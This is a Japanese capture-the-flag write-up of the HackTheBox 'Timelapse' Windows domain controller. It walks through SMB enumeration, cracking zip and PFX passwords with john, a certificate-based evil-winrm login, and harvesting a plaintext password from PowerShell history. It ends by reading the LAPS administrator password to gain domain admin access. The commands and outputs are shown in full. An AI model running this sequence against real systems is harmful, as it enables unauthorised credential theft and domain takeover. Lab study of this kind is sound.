🔥

HackTheBox Timelapse

2022/09/15に公開

Timelapse

侵入

nmap

ポートスキャンを行う

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.152 -oN nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-15 14:45 JST
-------------------------------------
PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  tcpwrapped        syn-ack ttl 127
88/tcp    open  tcpwrapped        syn-ack ttl 127
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
593/tcp   open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
5986/tcp  open  wsmans?           syn-ack ttl 127
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-09-15T13:49:44+00:00; +8h00m00s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  adws?             syn-ack ttl 127
49667/tcp open  unknown           syn-ack ttl 127
49673/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  unknown           syn-ack ttl 127
49696/tcp open  unknown           syn-ack ttl 127
-------------------------------------

多くのポートを確認。5986番ポートの出力に新たなドメインを発見

smb

445番ポートを確認しているため、一通りのコマンドを実行してみる

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ crackmapexec smb dc01.timelapse.htb 
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)

crackmapexec はいつものように実行できる
次に、smbclient を実行してみる

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ smbclient -L //dc01.timelapse.htb -N  
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Shares          Disk      
SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Shares を発見

Shares

引き続き、smbclient を使用していく

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ smbclient -N //dc01.timelapse.htb/Shares 
Try "help" to get a list of possible commands.
smb: \> ls
Dev                                 D        0  Tue Oct 26 04:40:06 2021
HelpDesk                            D        0  Tue Oct 26 00:48:42 2021

Dev と HelpDesk を発見

Dev

smb: \Dev\> ls
winrm_backup.zip                    A     2611  Tue Oct 26 00:46:42 2021

zip ファイルを発見

smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)

ファイルを取得しておく

HelpDesk

smb: \HelpDesk\> ls
LAPS.x64.msi                        A  1118208  Mon Oct 25 23:57:50 2021
LAPS_Datasheet.docx                 A   104422  Mon Oct 25 23:57:46 2021
LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 23:57:40 2021
LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 23:57:44 2021

LAPS はパスワードの管理を提供したり、サイバー攻撃に対しての防御策実装を支援する
参考記事 -> https://www.microsoft.com/en-us/download/details.aspx?id=46899

winrm_backup.zip

先程取得した zip ファイルを開く

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ unzip winrm_backup.zip                                       
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

パスワードが必要
ブルートフォースを行うために、zip2john を使用する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup_hash.zip                         
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: 2b chk, TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683

生成したファイルに対して john を実行する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup_hash.zip 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-09-15 18:15) 2.631g/s 9129Kp/s 9129Kc/s 9129KC/s surfroxy154..superview1024
Use the "--show" option to display all of the cracked passwords reliably
Session completed

supremelegacy という文字列を取得
再度、unzip を実行

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
inflating: legacyy_dev_auth.pfx

開くことに成功し、legacyy_dev_auth.pfx を取得できた

pfx

openssl を使用し、pfx ファイルから秘密鍵と公開鍵の抽出を試みる

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key 
Enter Import Password:
Can't read Password

こちらでも、パスワードが求められた
zip と同じく、ブルートフォースを行うために、pfx2john を実行する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ /usr/share/john/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth_hash.pfx

生成したファイルに john を実行

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth_hash.pfx 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:01:11 DONE (2022-09-15 18:42) 0.01397g/s 45160p/s 45160c/s 45160C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed

thuglegacy という文字列を取得

openssl

先程取得した文字列を使用して、openssl を実行する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc 
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

キーの抽出に成功。キーの復号に使用するためのパスフレーズを設定する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key 
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key

先程のパスフレーズを使用し、キーを復号

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt 
Enter Import Password:

最後に、証明書もエクスポートする

legacyy としてのシェル

evil-winrm

取得したキーと証明書を使用する

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt 
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

シェルの取得成功

user フラグ

*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグの取得に成功

列挙

net

*Evil-WinRM* PS C:\Users\legacyy\Desktop> net user legacyy 
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/15/2022 12:59:15 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.

特に面白そうなものはない

whoami /priv

*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /priv 

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

こちらも特に面白そうなものはない

env

特に情報が見つからないので、PowerShell の履歴ファイルを確認する

*Evil-WinRM* PS C:\> cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ 
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> dir

Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2022  11:46 PM            434 ConsoleHost_history.txt

環境変数 $env:APPDATA を使用
デフォルトファイルである ConsoleHost_history.txt を発見

ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

履歴の中で、svc_deploy と一緒に E3R$Q62^12p7PLlC%KWaxuaV という文字列を使用している
接続に $c として使用されていることから、パスワードである可能性がある

svc_deploy としてのシェル

evil-winrm

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S 
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy

シェルの取得に成功

権限昇格

net

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

LAPS_Readers に所属していることがわかる

Get-ADComputer

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd' 


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : 41F3L6,lg.cw[Zen51o.f$Vi
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

パスワードとして、41F3L6,lg.cw[Zen51o.f$Vi という文字列が出力された

root としてのシェル

evil-winrm

┌──(kali㉿kali)-[~/Desktop/Timelapse]
└─$ evil-winrm -i timelapse.htb -S -u administrator -p '41F3L6,lg.cw[Zen51o.f$Vi' 
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine           
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

シェルの取得に成功

TRX

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Desktop に root.txt がない
他ユーザの存在を確認する

*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX

TRX ユーザの存在を確認

*Evil-WinRM* PS C:\Users> net user TRX
User name                    TRX
Full Name                    TRX
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2022 6:43:45 PM
Password expires             Never
Password changeable          2/24/2022 6:43:45 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/15/2022 6:43:33 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.

調べてみると、Domain Users に属していることがわかる

root フラグ

TRX のデスクトップを確認してみる

*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグの取得に成功

所感

今回のボックスは、zip や pfx に対してのアプローチを経験でき、いい学習になった。root.txt が Administrator になかった時は、まだ先がある気がしたが、普通に TRX にあったので驚いた。

Discussion